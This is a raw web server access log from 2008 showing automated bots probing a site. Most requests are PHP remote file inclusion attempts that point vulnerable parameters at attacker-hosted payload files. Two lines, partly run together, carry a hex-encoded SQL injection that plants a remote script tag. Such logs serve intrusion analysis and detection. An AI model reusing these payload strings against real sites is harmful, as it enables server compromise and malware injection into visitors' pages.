70.86.229.242 - - [19/Aug/2008:11:43:11 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:43:41 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:43:44 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:43:50 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:43:50 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:43:50 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:44:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:33 -0700] "GET //include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:33 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:33 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:33 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:45 -0700] "GET /logs/access_080519.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:45 -0700] "GET //include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:45 -0700] "GET /logs/access_080725.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.32.113.228 - - [19/Aug/2008:11:44:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.32.113.228 - - [19/Aug/2008:11:44:47 -0700] "GET //skin/zero_vote/error.php?dir=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:57 -0700] "GET /logs/access_080519.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:57 -0700] "GET //include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:57 -0700] "GET /logs//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:44:57 -0700] "GET /logs/access_080725.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:45:37 -0700] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:45:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:45:37 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:45:45 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:45:49 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:45:49 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:45:49 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:00 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:55 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:55 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:11:46:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:03 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:03 -0700] "GET //include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:03 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
65.55.211.29 - - [19/Aug/2008:11:47:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [19/Aug/2008:11:47:09 -0700] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:12 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:33 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:34 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:38 -0700] "GET /logs/access_080812.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:50 -0700] "GET /logs/access_080519.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:51 -0700] "GET //include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:47:51 -0700] "GET /logs//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:55 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:56 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:47:56 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:48:01 -0700] "GET /logs/access_080812.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:11:48:06 -0700] "GET /logs/access_080725.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.101.4.49 - - [19/Aug/2008:11:48:27 -0700] "GET /logs/access_080812.log//index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:10 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:11 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:11 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:22 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:22 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:22 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:28 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:49:39 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:49:39 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:49:39 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:49:42 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:50:01 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:50:10 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:50:10 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:50:11 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.67.204 - - [19/Aug/2008:11:50:13 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:51:57 -0700] "GET /logs/access_080622.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:51:57 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.26.113.175 - - [19/Aug/2008:11:52:14 -0700] "GET /logs/access_070809.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043emtgibson/us4:69.110.78.80.26.113.175 - - [19/Aug/2008:11:52:16 -0700] "GET /logs/access_070809.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432tickets34746/us1:82.40.166.135.41.76 - - [19/Aug/2008:11:52:21 -0700] "GET /logs/access_080725.log//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:21 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:29 -0700] "GET //?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 9899 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [19/Aug/2008:11:52:32 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:34 -0700] "GET /logs/access_080724.log//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:11:52:37 -0700] "GET /logs/access_080725.log//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:38 -0700] "GET /logs/access_080622.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:38 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:11:52:38 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:11:52:39 -0700] "GET //?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 9899 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:11:52:40 -0700] "GET /logs/access_080724.log//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [19/Aug/2008:11:52:43 -0700] "GET /logs//?INCLUDE_FOLDER=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 61289 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:52:50 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:52:50 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:52:50 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:52:50 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:11:52:53 -0700] "GET /blog/index.php/page/3/ HTTP/1.1" 200 68216 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
80.70.113.10 - - [19/Aug/2008:11:53:04 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.70.113.10 - - [19/Aug/2008:11:53:11 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.73.116 - - [19/Aug/2008:11:53:16 -0700] "GET /logs//auth/auth.php?phpbb_root_path=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.160.73.116 - - [19/Aug/2008:11:53:16 -0700] "GET //auth/auth.php?phpbb_root_path=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.12 - - [19/Aug/2008:11:53:32 -0700] "GET /logs/access_080808.log/classes/adodbt/sql.php?classes_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [19/Aug/2008:11:53:32 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [19/Aug/2008:11:53:32 -0700] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [19/Aug/2008:11:53:44 -0700] "GET /logs/access_080812.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.79.246.241 - - [19/Aug/2008:11:53:58 -0700] "GET /logs/access_080807.log//include/admin.lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.12.15.28 - - [19/Aug/2008:11:54:45 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.12.15.28 - - [19/Aug/2008:11:54:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:27 -0700] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:28 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:36 -0700] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:39 -0700] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:39 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:39 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:11:55:56 -0700] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
